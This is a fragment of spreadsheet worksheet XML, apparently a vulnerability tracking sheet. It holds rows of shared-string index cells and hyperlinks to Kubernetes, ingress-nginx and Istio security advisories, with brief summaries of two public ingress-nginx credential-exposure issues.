      <c r="I54" s="61" t="s">
        <v>848</v>
      </c>
      <c r="J54" s="61" t="s">
        <v>849</v>
      </c>
      <c r="K54" s="61" t="s">
        <v>396</v>
      </c>
      <c r="L54" s="61" t="s">
        <v>253</v>
      </c>
      <c r="O54" s="61" t="s">
        <v>70</v>
      </c>
      <c r="P54" s="61" t="s">
        <v>159</v>
      </c>
      <c r="Q54" s="58" t="s">
        <v>72</v>
      </c>
      <c r="S54" s="61" t="s">
        <v>319</v>
      </c>
      <c r="T54" s="136" t="s">
        <v>850</v>
      </c>
      <c r="U54" s="136"/>
      <c r="V54" s="136"/>
      <c r="W54" s="61" t="s">
        <v>117</v>
      </c>
      <c r="X54" s="136"/>
      <c r="Y54" s="136"/>
      <c r="Z54" s="136"/>
      <c r="AA54" s="136"/>
      <c r="AB54" s="136"/>
      <c r="AC54" s="136"/>
      <c r="AD54" s="136"/>
      <c r="AN54" s="61" t="s">
        <v>239</v>
      </c>
      <c r="AO54" s="61" t="s">
        <v>851</v>
      </c>
      <c r="AV54" s="61" t="s">
        <v>780</v>
      </c>
      <c r="AW54" s="61" t="s">
        <v>257</v>
      </c>
      <c r="AY54" s="60"/>
      <c r="BA54" s="60"/>
      <c r="BB54" s="60"/>
      <c r="BC54" s="60"/>
      <c r="BD54" s="60"/>
      <c r="BE54" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="55" s="60" customFormat="1" ht="94.5" spans="1:57">
      <c r="A55" s="59" t="s">
        <v>852</v>
      </c>
      <c r="B55" s="115" t="s">
        <v>853</v>
      </c>
      <c r="C55" s="115" t="s">
        <v>283</v>
      </c>
      <c r="D55" s="108" t="s">
        <v>854</v>
      </c>
      <c r="E55" s="60" t="s">
        <v>855</v>
      </c>
      <c r="F55" s="41" t="s">
        <v>856</v>
      </c>
      <c r="G55" s="41" t="s">
        <v>857</v>
      </c>
      <c r="H55" s="41" t="s">
        <v>234</v>
      </c>
      <c r="I55" s="41" t="s">
        <v>858</v>
      </c>
      <c r="J55" s="41" t="s">
        <v>859</v>
      </c>
      <c r="K55" s="41" t="s">
        <v>860</v>
      </c>
      <c r="L55" s="60" t="s">
        <v>67</v>
      </c>
      <c r="M55" s="41" t="s">
        <v>68</v>
      </c>
      <c r="N55" s="41" t="s">
        <v>237</v>
      </c>
      <c r="O55" s="41" t="s">
        <v>70</v>
      </c>
      <c r="P55" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q55" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R55" s="41"/>
      <c r="S55" s="41" t="s">
        <v>74</v>
      </c>
      <c r="T55" s="60" t="s">
        <v>861</v>
      </c>
      <c r="U55" s="58"/>
      <c r="V55" s="58"/>
      <c r="W55" s="58" t="s">
        <v>862</v>
      </c>
      <c r="AF55" s="58"/>
      <c r="AG55" s="58"/>
      <c r="AH55" s="58"/>
      <c r="AI55" s="58"/>
      <c r="AJ55" s="60" t="s">
        <v>221</v>
      </c>
      <c r="AK55" s="58"/>
      <c r="AL55" s="58"/>
      <c r="AM55" s="58"/>
      <c r="AN55" s="60" t="s">
        <v>270</v>
      </c>
      <c r="AO55" s="60" t="s">
        <v>863</v>
      </c>
      <c r="AV55" s="60" t="s">
        <v>864</v>
      </c>
      <c r="AW55" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE55" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="56" s="63" customFormat="1" ht="180" customHeight="1" spans="1:57">
      <c r="A56" s="116" t="s">
        <v>865</v>
      </c>
      <c r="B56" s="117" t="s">
        <v>866</v>
      </c>
      <c r="C56" s="117" t="s">
        <v>867</v>
      </c>
      <c r="D56" s="118" t="s">
        <v>868</v>
      </c>
      <c r="E56" s="63" t="s">
        <v>869</v>
      </c>
      <c r="F56" s="118" t="s">
        <v>870</v>
      </c>
      <c r="G56" s="118" t="s">
        <v>871</v>
      </c>
      <c r="H56" s="118" t="s">
        <v>872</v>
      </c>
      <c r="I56" s="132" t="s">
        <v>873</v>
      </c>
      <c r="J56" s="118" t="s">
        <v>874</v>
      </c>
      <c r="K56" s="118" t="s">
        <v>396</v>
      </c>
      <c r="L56" s="118"/>
      <c r="M56" s="118"/>
      <c r="N56" s="118"/>
      <c r="O56" s="118" t="s">
        <v>875</v>
      </c>
      <c r="P56" s="63" t="s">
        <v>159</v>
      </c>
      <c r="Q56" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R56" s="118"/>
      <c r="S56" s="118" t="s">
        <v>319</v>
      </c>
      <c r="T56" s="63" t="s">
        <v>876</v>
      </c>
      <c r="U56" s="121"/>
      <c r="V56" s="121"/>
      <c r="W56" s="121" t="s">
        <v>117</v>
      </c>
      <c r="AF56" s="121"/>
      <c r="AG56" s="121"/>
      <c r="AH56" s="121"/>
      <c r="AI56" s="121"/>
      <c r="AK56" s="121"/>
      <c r="AL56" s="121"/>
      <c r="AM56" s="121"/>
      <c r="AN56" s="63" t="s">
        <v>239</v>
      </c>
      <c r="AO56" s="142" t="s">
        <v>877</v>
      </c>
      <c r="AQ56" s="142"/>
      <c r="AR56" s="142"/>
      <c r="AS56" s="142"/>
      <c r="AT56" s="142"/>
      <c r="AU56" s="142"/>
      <c r="AV56" s="63" t="s">
        <v>293</v>
      </c>
      <c r="AW56" s="63" t="s">
        <v>257</v>
      </c>
      <c r="AY56" s="60"/>
      <c r="BA56" s="60"/>
      <c r="BB56" s="60"/>
      <c r="BC56" s="60"/>
      <c r="BD56" s="60"/>
      <c r="BE56" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="57" s="63" customFormat="1" ht="409.5" spans="1:57">
      <c r="A57" s="119" t="s">
        <v>878</v>
      </c>
      <c r="B57" s="119" t="s">
        <v>879</v>
      </c>
      <c r="C57" s="119" t="s">
        <v>880</v>
      </c>
      <c r="D57" s="119" t="s">
        <v>881</v>
      </c>
      <c r="E57" s="63" t="s">
        <v>882</v>
      </c>
      <c r="F57" s="119" t="s">
        <v>883</v>
      </c>
      <c r="G57" s="119" t="s">
        <v>884</v>
      </c>
      <c r="H57" s="63" t="s">
        <v>872</v>
      </c>
      <c r="I57" s="119" t="s">
        <v>885</v>
      </c>
      <c r="J57" s="119" t="s">
        <v>886</v>
      </c>
      <c r="K57" s="63" t="s">
        <v>396</v>
      </c>
      <c r="L57" s="121" t="s">
        <v>253</v>
      </c>
      <c r="M57" s="121"/>
      <c r="N57" s="121"/>
      <c r="O57" s="119" t="s">
        <v>70</v>
      </c>
      <c r="P57" s="63" t="s">
        <v>159</v>
      </c>
      <c r="Q57" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R57" s="119"/>
      <c r="S57" s="119" t="s">
        <v>319</v>
      </c>
      <c r="T57" s="63" t="s">
        <v>887</v>
      </c>
      <c r="U57" s="121"/>
      <c r="V57" s="121"/>
      <c r="W57" s="121" t="s">
        <v>117</v>
      </c>
      <c r="AF57" s="121"/>
      <c r="AG57" s="121"/>
      <c r="AH57" s="121"/>
      <c r="AI57" s="121"/>
      <c r="AJ57" s="63" t="s">
        <v>221</v>
      </c>
      <c r="AK57" s="121"/>
      <c r="AL57" s="121"/>
      <c r="AM57" s="121"/>
      <c r="AN57" s="63" t="s">
        <v>239</v>
      </c>
      <c r="AO57" s="63" t="s">
        <v>888</v>
      </c>
      <c r="AV57" s="63" t="s">
        <v>889</v>
      </c>
      <c r="AW57" s="63" t="s">
        <v>257</v>
      </c>
      <c r="AY57" s="60"/>
      <c r="BA57" s="60"/>
      <c r="BB57" s="60"/>
      <c r="BC57" s="60"/>
      <c r="BD57" s="60"/>
      <c r="BE57" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="58" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A58" s="69" t="s">
        <v>890</v>
      </c>
      <c r="B58" s="120" t="s">
        <v>891</v>
      </c>
      <c r="C58" s="120" t="s">
        <v>283</v>
      </c>
      <c r="D58" s="58" t="s">
        <v>892</v>
      </c>
      <c r="E58" s="60" t="s">
        <v>893</v>
      </c>
      <c r="F58" s="121" t="s">
        <v>894</v>
      </c>
      <c r="G58" s="122" t="s">
        <v>895</v>
      </c>
      <c r="H58" s="58" t="s">
        <v>896</v>
      </c>
      <c r="I58" s="121" t="s">
        <v>897</v>
      </c>
      <c r="J58" s="121" t="s">
        <v>898</v>
      </c>
      <c r="K58" s="58" t="s">
        <v>791</v>
      </c>
      <c r="L58" s="58"/>
      <c r="M58" s="58" t="s">
        <v>368</v>
      </c>
      <c r="N58" s="58" t="s">
        <v>69</v>
      </c>
      <c r="O58" s="121" t="s">
        <v>70</v>
      </c>
      <c r="P58" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q58" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R58" s="121"/>
      <c r="S58" s="121" t="s">
        <v>899</v>
      </c>
      <c r="T58" s="60" t="s">
        <v>900</v>
      </c>
      <c r="U58" s="58"/>
      <c r="V58" s="58"/>
      <c r="W58" s="58" t="s">
        <v>117</v>
      </c>
      <c r="AF58" s="58"/>
      <c r="AG58" s="58"/>
      <c r="AH58" s="58"/>
      <c r="AI58" s="58"/>
      <c r="AK58" s="58"/>
      <c r="AL58" s="58"/>
      <c r="AM58" s="58"/>
      <c r="AN58" s="60" t="s">
        <v>901</v>
      </c>
      <c r="AO58" s="60" t="s">
        <v>902</v>
      </c>
      <c r="AV58" s="60" t="s">
        <v>293</v>
      </c>
      <c r="AW58" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE58" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="59" s="60" customFormat="1" ht="252" spans="1:57">
      <c r="A59" s="73" t="s">
        <v>903</v>
      </c>
      <c r="B59" s="60" t="s">
        <v>904</v>
      </c>
      <c r="C59" s="60" t="s">
        <v>905</v>
      </c>
      <c r="D59" s="60" t="s">
        <v>906</v>
      </c>
      <c r="H59" s="60" t="s">
        <v>907</v>
      </c>
      <c r="I59" s="60" t="s">
        <v>908</v>
      </c>
      <c r="J59" s="60" t="s">
        <v>909</v>
      </c>
      <c r="K59" s="60" t="s">
        <v>910</v>
      </c>
      <c r="O59" s="60" t="s">
        <v>70</v>
      </c>
      <c r="P59" s="60" t="s">
        <v>159</v>
      </c>
      <c r="S59" s="60" t="s">
        <v>74</v>
      </c>
      <c r="T59" s="60" t="s">
        <v>911</v>
      </c>
      <c r="W59" s="60" t="s">
        <v>332</v>
      </c>
      <c r="AN59" s="60" t="s">
        <v>92</v>
      </c>
      <c r="AO59" s="60" t="s">
        <v>912</v>
      </c>
      <c r="AV59" s="60" t="s">
        <v>223</v>
      </c>
      <c r="AW59" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE59" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="60" s="60" customFormat="1" ht="325.5" spans="1:57">
      <c r="A60" s="73" t="s">
        <v>913</v>
      </c>
      <c r="B60" s="60" t="s">
        <v>914</v>
      </c>
      <c r="C60" s="60" t="s">
        <v>905</v>
      </c>
      <c r="D60" s="60" t="s">
        <v>915</v>
      </c>
      <c r="H60" s="60" t="s">
        <v>916</v>
      </c>
      <c r="I60" s="60" t="s">
        <v>917</v>
      </c>
      <c r="J60" s="127" t="s">
        <v>918</v>
      </c>
      <c r="K60" s="60" t="s">
        <v>396</v>
      </c>
      <c r="O60" s="60" t="s">
        <v>70</v>
      </c>
      <c r="P60" s="60" t="s">
        <v>159</v>
      </c>
      <c r="S60" s="60" t="s">
        <v>74</v>
      </c>
      <c r="T60" s="60" t="s">
        <v>919</v>
      </c>
      <c r="W60" s="60" t="s">
        <v>117</v>
      </c>
      <c r="AN60" s="60" t="s">
        <v>270</v>
      </c>
      <c r="AO60" s="60" t="s">
        <v>920</v>
      </c>
      <c r="AV60" s="60" t="s">
        <v>293</v>
      </c>
      <c r="AW60" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE60" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="61" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A61" s="73" t="s">
        <v>921</v>
      </c>
      <c r="B61" s="60" t="s">
        <v>922</v>
      </c>
      <c r="C61" s="60" t="s">
        <v>923</v>
      </c>
      <c r="D61" s="60" t="s">
        <v>924</v>
      </c>
      <c r="E61" s="60" t="s">
        <v>925</v>
      </c>
      <c r="F61" s="60" t="s">
        <v>926</v>
      </c>
      <c r="G61" s="88" t="s">
        <v>927</v>
      </c>
      <c r="H61" s="60" t="s">
        <v>928</v>
      </c>
      <c r="I61" s="60" t="s">
        <v>929</v>
      </c>
      <c r="J61" s="60" t="s">
        <v>930</v>
      </c>
      <c r="K61" s="60" t="s">
        <v>396</v>
      </c>
      <c r="L61" s="60" t="s">
        <v>253</v>
      </c>
      <c r="O61" s="60" t="s">
        <v>70</v>
      </c>
      <c r="P61" s="60" t="s">
        <v>159</v>
      </c>
      <c r="S61" s="60" t="s">
        <v>74</v>
      </c>
      <c r="T61" s="60" t="s">
        <v>931</v>
      </c>
      <c r="W61" s="60" t="s">
        <v>117</v>
      </c>
      <c r="AN61" s="60" t="s">
        <v>239</v>
      </c>
      <c r="AO61" s="60" t="s">
        <v>932</v>
      </c>
      <c r="AV61" s="60" t="s">
        <v>933</v>
      </c>
      <c r="AW61" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE61" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="62" s="60" customFormat="1" ht="409.5" spans="1:57">
      <c r="A62" s="73" t="s">
        <v>934</v>
      </c>
      <c r="B62" s="60" t="s">
        <v>935</v>
      </c>
      <c r="C62" s="60" t="s">
        <v>283</v>
      </c>
      <c r="D62" s="60" t="s">
        <v>936</v>
      </c>
      <c r="E62" s="60" t="s">
        <v>937</v>
      </c>
      <c r="F62" s="60" t="s">
        <v>938</v>
      </c>
      <c r="G62" s="60" t="s">
        <v>939</v>
      </c>
      <c r="H62" s="60" t="s">
        <v>940</v>
      </c>
      <c r="I62" s="60" t="s">
        <v>941</v>
      </c>
      <c r="J62" s="60" t="s">
        <v>942</v>
      </c>
      <c r="K62" s="60" t="s">
        <v>367</v>
      </c>
      <c r="M62" s="60" t="s">
        <v>68</v>
      </c>
      <c r="N62" s="60" t="s">
        <v>237</v>
      </c>
      <c r="O62" s="60" t="s">
        <v>70</v>
      </c>
      <c r="P62" s="60" t="s">
        <v>159</v>
      </c>
      <c r="Q62" s="58" t="s">
        <v>72</v>
      </c>
      <c r="S62" s="60" t="s">
        <v>899</v>
      </c>
      <c r="T62" s="60" t="s">
        <v>943</v>
      </c>
      <c r="W62" s="60" t="s">
        <v>117</v>
      </c>
      <c r="AO62" s="60" t="s">
        <v>901</v>
      </c>
      <c r="AW62" s="60" t="s">
        <v>257</v>
      </c>
      <c r="BE62" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="63" s="64" customFormat="1" ht="409.5" spans="1:57">
      <c r="A63" s="123" t="s">
        <v>944</v>
      </c>
      <c r="B63" s="64" t="s">
        <v>945</v>
      </c>
      <c r="C63" s="124" t="s">
        <v>283</v>
      </c>
      <c r="D63" s="123" t="s">
        <v>946</v>
      </c>
      <c r="E63" s="64" t="s">
        <v>947</v>
      </c>
      <c r="F63" s="64" t="s">
        <v>948</v>
      </c>
      <c r="G63" s="123" t="s">
        <v>949</v>
      </c>
      <c r="H63" s="64" t="s">
        <v>950</v>
      </c>
      <c r="I63" s="64" t="s">
        <v>951</v>
      </c>
      <c r="J63" s="64" t="s">
        <v>952</v>
      </c>
      <c r="K63" s="64" t="s">
        <v>367</v>
      </c>
      <c r="L63" s="124"/>
      <c r="M63" s="124" t="s">
        <v>368</v>
      </c>
      <c r="N63" s="124" t="s">
        <v>69</v>
      </c>
      <c r="O63" s="124" t="s">
        <v>953</v>
      </c>
      <c r="P63" s="64" t="s">
        <v>159</v>
      </c>
      <c r="Q63" s="58" t="s">
        <v>72</v>
      </c>
      <c r="R63" s="124"/>
      <c r="S63" s="124" t="s">
        <v>74</v>
      </c>
      <c r="T63" s="64" t="s">
        <v>954</v>
      </c>
      <c r="W63" s="64" t="s">
        <v>332</v>
      </c>
      <c r="AN63" s="64" t="s">
        <v>92</v>
      </c>
      <c r="AO63" s="64" t="s">
        <v>955</v>
      </c>
      <c r="AV63" s="64" t="s">
        <v>293</v>
      </c>
      <c r="AW63" s="64" t="s">
        <v>257</v>
      </c>
      <c r="AY63" s="60"/>
      <c r="BA63" s="60"/>
      <c r="BB63" s="60"/>
      <c r="BC63" s="60"/>
      <c r="BD63" s="60"/>
      <c r="BE63" s="145">
        <v>0.19</v>
      </c>
    </row>
    <row r="64" s="57" customFormat="1" ht="244" customHeight="1" spans="1:16384">
      <c r="A64" s="65" t="s">
        <v>956</v>
      </c>
      <c r="B64" s="57" t="s">
        <v>957</v>
      </c>
      <c r="C64" s="57" t="s">
        <v>486</v>
      </c>
      <c r="D64" s="57" t="s">
        <v>958</v>
      </c>
      <c r="E64" s="57" t="s">
        <v>959</v>
      </c>
      <c r="G64" s="57" t="s">
        <v>960</v>
      </c>
      <c r="H64" s="57" t="s">
        <v>63</v>
      </c>
      <c r="I64" s="57" t="s">
        <v>961</v>
      </c>
      <c r="J64" s="57" t="s">
        <v>962</v>
      </c>
      <c r="K64" s="57" t="s">
        <v>145</v>
      </c>
      <c r="L64" s="57" t="s">
        <v>67</v>
      </c>
      <c r="M64" s="57" t="s">
        <v>68</v>
      </c>
      <c r="N64" s="57" t="s">
        <v>463</v>
      </c>
      <c r="O64" s="57" t="s">
        <v>70</v>
      </c>
      <c r="P64" s="57" t="s">
        <v>159</v>
      </c>
      <c r="Q64" s="57" t="s">
        <v>72</v>
      </c>
      <c r="S64" s="57" t="s">
        <v>74</v>
      </c>
      <c r="T64" s="66" t="s">
        <v>963</v>
      </c>
      <c r="U64" s="57" t="s">
        <v>70</v>
      </c>
      <c r="V64" s="57" t="s">
        <v>964</v>
      </c>
      <c r="W64" s="57" t="s">
        <v>147</v>
      </c>
      <c r="AA64" s="57" t="s">
        <v>81</v>
      </c>
      <c r="AB64" s="57" t="s">
        <v>965</v>
      </c>
      <c r="AH64" s="57" t="s">
        <v>966</v>
      </c>
      <c r="AN64" s="66" t="s">
        <v>775</v>
      </c>
      <c r="AO64" s="57" t="s">
        <v>92</v>
      </c>
      <c r="AP64" s="57" t="s">
        <v>967</v>
      </c>
      <c r="AU64" s="57" t="s">
        <v>968</v>
      </c>
      <c r="AV64" s="66" t="s">
        <v>969</v>
      </c>
      <c r="AW64" s="57" t="s">
        <v>970</v>
      </c>
      <c r="AX64" s="57" t="s">
        <v>971</v>
      </c>
      <c r="AY64" s="60" t="s">
        <v>972</v>
      </c>
      <c r="BA64" s="60" t="s">
        <v>973</v>
      </c>
      <c r="BB64" s="60"/>
      <c r="BC64" s="60"/>
      <c r="BD64" s="60"/>
      <c r="BE64" s="60"/>
      <c r="XFD64" s="63"/>
    </row>
    <row r="65" s="57" customFormat="1" ht="191.25" spans="1:16384">
      <c r="A65" s="65" t="s">
        <v>974</v>
      </c>
      <c r="B65" s="57" t="s">
        <v>957</v>
      </c>
      <c r="C65" s="57" t="s">
        <v>486</v>
      </c>
      <c r="D65" s="57" t="s">
        <v>975</v>
      </c>
      <c r="E65" s="57" t="s">
        <v>959</v>
      </c>
      <c r="F65" s="88" t="s">
        <v>976</v>
      </c>
      <c r="G65" s="57" t="s">
        <v>977</v>
      </c>
      <c r="H65" s="57" t="s">
        <v>63</v>
      </c>
      <c r="I65" s="57" t="s">
        <v>961</v>
      </c>
      <c r="J65" s="57" t="s">
        <v>962</v>
      </c>
      <c r="K65" s="57" t="s">
        <v>145</v>
      </c>
      <c r="L65" s="57" t="s">
        <v>67</v>
      </c>
      <c r="M65" s="57" t="s">
        <v>68</v>
      </c>
      <c r="N65" s="57" t="s">
        <v>463</v>
      </c>
      <c r="O65" s="57" t="s">
        <v>70</v>
      </c>
      <c r="P65" s="57" t="s">
        <v>159</v>
      </c>
      <c r="Q65" s="57" t="s">
        <v>72</v>
      </c>
      <c r="S65" s="57" t="s">
        <v>74</v>
      </c>
      <c r="T65" s="66" t="s">
        <v>978</v>
      </c>
      <c r="U65" s="57" t="s">
        <v>84</v>
      </c>
      <c r="W65" s="57" t="s">
        <v>979</v>
      </c>
      <c r="AA65" s="57" t="s">
        <v>81</v>
      </c>
      <c r="AB65" s="57" t="s">
        <v>965</v>
      </c>
      <c r="AH65" s="57" t="s">
        <v>980</v>
      </c>
      <c r="AN65" s="66" t="s">
        <v>775</v>
      </c>
      <c r="AO65" s="57" t="s">
        <v>92</v>
      </c>
      <c r="AP65" s="57" t="s">
        <v>967</v>
      </c>
      <c r="AV65" s="66" t="s">
        <v>981</v>
      </c>
      <c r="AW65" s="57" t="s">
        <v>982</v>
      </c>
      <c r="AX65" s="57" t="s">
        <v>983</v>
      </c>
      <c r="AY65" s="60" t="s">
        <v>984</v>
      </c>
      <c r="BA65" s="60" t="s">
        <v>973</v>
      </c>
      <c r="BB65" s="60"/>
      <c r="BC65" s="60"/>
      <c r="BD65" s="60"/>
      <c r="BE65" s="60"/>
      <c r="XFD65" s="63"/>
    </row>
    <row r="66" s="57" customFormat="1" ht="191.25" spans="1:16384">
      <c r="A66" s="65" t="s">
        <v>985</v>
      </c>
      <c r="B66" s="57" t="s">
        <v>957</v>
      </c>
      <c r="C66" s="57" t="s">
        <v>486</v>
      </c>
      <c r="D66" s="57" t="s">
        <v>986</v>
      </c>
      <c r="E66" s="57" t="s">
        <v>987</v>
      </c>
      <c r="F66" s="88" t="s">
        <v>988</v>
      </c>
      <c r="G66" s="57" t="s">
        <v>989</v>
      </c>
      <c r="H66" s="57" t="s">
        <v>63</v>
      </c>
      <c r="I66" s="57" t="s">
        <v>961</v>
      </c>
      <c r="J66" s="57" t="s">
        <v>962</v>
      </c>
      <c r="K66" s="57" t="s">
        <v>145</v>
      </c>
      <c r="L66" s="57" t="s">
        <v>67</v>
      </c>
      <c r="M66" s="57" t="s">
        <v>68</v>
      </c>
      <c r="N66" s="57" t="s">
        <v>463</v>
      </c>
      <c r="O66" s="57" t="s">
        <v>70</v>
      </c>
      <c r="P66" s="57" t="s">
        <v>159</v>
      </c>
      <c r="Q66" s="57" t="s">
        <v>72</v>
      </c>
      <c r="S66" s="57" t="s">
        <v>74</v>
      </c>
      <c r="T66" s="66" t="s">
        <v>990</v>
      </c>
      <c r="U66" s="57" t="s">
        <v>84</v>
      </c>
      <c r="W66" s="57" t="s">
        <v>147</v>
      </c>
      <c r="AA66" s="57" t="s">
        <v>81</v>
      </c>
      <c r="AB66" s="57" t="s">
        <v>965</v>
      </c>
      <c r="AH66" s="57" t="s">
        <v>966</v>
      </c>
      <c r="AN66" s="66" t="s">
        <v>775</v>
      </c>
      <c r="AO66" s="57" t="s">
        <v>92</v>
      </c>
      <c r="AP66" s="57" t="s">
        <v>967</v>
      </c>
      <c r="AU66" s="57" t="s">
        <v>151</v>
      </c>
      <c r="AV66" s="66" t="s">
        <v>969</v>
      </c>
      <c r="AW66" s="57" t="s">
        <v>991</v>
      </c>
      <c r="AX66" s="57" t="s">
        <v>971</v>
      </c>
      <c r="AY66" s="60" t="s">
        <v>972</v>
      </c>
      <c r="BA66" s="60" t="s">
        <v>973</v>
      </c>
      <c r="BB66" s="60"/>
      <c r="BC66" s="60"/>
      <c r="BD66" s="60"/>
      <c r="BE66" s="60"/>
      <c r="XFD66" s="63"/>
    </row>
    <row r="67" s="57" customFormat="1" ht="254" customHeight="1" spans="1:16384">
      <c r="A67" s="65" t="s">
        <v>992</v>
      </c>
      <c r="B67" s="57" t="s">
        <v>957</v>
      </c>
      <c r="C67" s="57" t="s">
        <v>486</v>
      </c>
      <c r="D67" s="57" t="s">
        <v>993</v>
      </c>
      <c r="E67" s="57" t="s">
        <v>994</v>
      </c>
      <c r="G67" s="57" t="s">
        <v>995</v>
      </c>
      <c r="H67" s="57" t="s">
        <v>63</v>
      </c>
      <c r="I67" s="57" t="s">
        <v>961</v>
      </c>
      <c r="J67" s="57" t="s">
        <v>996</v>
      </c>
      <c r="K67" s="57" t="s">
        <v>997</v>
      </c>
      <c r="L67" s="57" t="s">
        <v>67</v>
      </c>
      <c r="M67" s="57" t="s">
        <v>68</v>
      </c>
      <c r="N67" s="57" t="s">
        <v>463</v>
      </c>
      <c r="O67" s="57" t="s">
        <v>70</v>
      </c>
      <c r="P67" s="57" t="s">
        <v>159</v>
      </c>
      <c r="Q67" s="57" t="s">
        <v>998</v>
      </c>
      <c r="R67" s="57" t="s">
        <v>84</v>
      </c>
      <c r="T67" s="66"/>
      <c r="U67" s="57" t="s">
        <v>84</v>
      </c>
      <c r="AA67" s="57" t="s">
        <v>81</v>
      </c>
      <c r="AB67" s="57" t="s">
        <v>965</v>
      </c>
      <c r="AN67" s="66"/>
      <c r="AP67" s="57" t="s">
        <v>967</v>
      </c>
      <c r="AV67" s="66"/>
      <c r="AY67" s="60"/>
      <c r="BA67" s="60"/>
      <c r="BB67" s="60"/>
      <c r="BC67" s="60"/>
      <c r="BD67" s="60"/>
      <c r="BE67" s="60"/>
      <c r="XFD67" s="63"/>
    </row>
    <row r="68" s="57" customFormat="1" ht="258.75" spans="1:16384">
      <c r="A68" s="65" t="s">
        <v>999</v>
      </c>
      <c r="C68" s="57" t="s">
        <v>486</v>
      </c>
      <c r="D68" s="57" t="s">
        <v>1000</v>
      </c>
      <c r="E68" s="57" t="s">
        <v>1001</v>
      </c>
      <c r="F68" s="57" t="s">
        <v>1002</v>
      </c>
      <c r="G68" s="57" t="s">
        <v>1003</v>
      </c>
      <c r="H68" s="57" t="s">
        <v>63</v>
      </c>
      <c r="I68" s="57" t="s">
        <v>961</v>
      </c>
      <c r="J68" s="57" t="s">
        <v>1004</v>
      </c>
      <c r="K68" s="57" t="s">
        <v>1005</v>
      </c>
      <c r="L68" s="57" t="s">
        <v>1006</v>
      </c>
      <c r="M68" s="57" t="s">
        <v>368</v>
      </c>
      <c r="N68" s="57" t="s">
        <v>540</v>
      </c>
      <c r="O68" s="57" t="s">
        <v>70</v>
      </c>
      <c r="P68" s="57" t="s">
        <v>159</v>
      </c>
      <c r="Q68" s="57" t="s">
        <v>72</v>
      </c>
      <c r="R68" s="57" t="s">
        <v>84</v>
      </c>
      <c r="S68" s="57" t="s">
        <v>74</v>
      </c>
      <c r="T68" s="66" t="s">
        <v>1007</v>
      </c>
      <c r="U68" s="57" t="s">
        <v>70</v>
      </c>
      <c r="V68" s="57" t="s">
        <v>744</v>
      </c>
      <c r="W68" s="68" t="s">
        <v>979</v>
      </c>
      <c r="X68" s="57" t="s">
        <v>84</v>
      </c>
      <c r="Y68" s="57" t="s">
        <v>118</v>
      </c>
      <c r="Z68" s="57" t="s">
        <v>119</v>
      </c>
      <c r="AA68" s="57" t="s">
        <v>81</v>
      </c>
      <c r="AB68" s="57" t="s">
        <v>1008</v>
      </c>
      <c r="AD68" s="57" t="s">
        <v>84</v>
      </c>
      <c r="AN68" s="66" t="s">
        <v>239</v>
      </c>
      <c r="AO68" s="57" t="s">
        <v>383</v>
      </c>
      <c r="AP68" s="57" t="s">
        <v>967</v>
      </c>
      <c r="AU68" s="57" t="s">
        <v>1009</v>
      </c>
      <c r="AV68" s="66" t="s">
        <v>1010</v>
      </c>
      <c r="AW68" s="57" t="s">
        <v>1011</v>
      </c>
      <c r="AX68" s="57" t="s">
        <v>1012</v>
      </c>
      <c r="AY68" s="60" t="s">
        <v>512</v>
      </c>
      <c r="AZ68" s="57" t="s">
        <v>482</v>
      </c>
      <c r="BA68" s="60" t="s">
        <v>1013</v>
      </c>
      <c r="BB68" s="60"/>
      <c r="BC68" s="60"/>
      <c r="BD68" s="60"/>
      <c r="BE68" s="60"/>
      <c r="XFD68" s="63"/>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:XFD68" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <conditionalFormatting sqref="A54">
    <cfRule type="duplicateValues" dxfId="0" priority="1"/>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="G9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="D8" r:id="rId2" display="Ingress-nginx path can be pointed to service account token file：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="G8" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="D7" r:id="rId2" display="Ingress-nginx directive injection via annotations: A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="G7" r:id="rId4" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="G6" r:id="rId5" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="G10" r:id="rId6" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
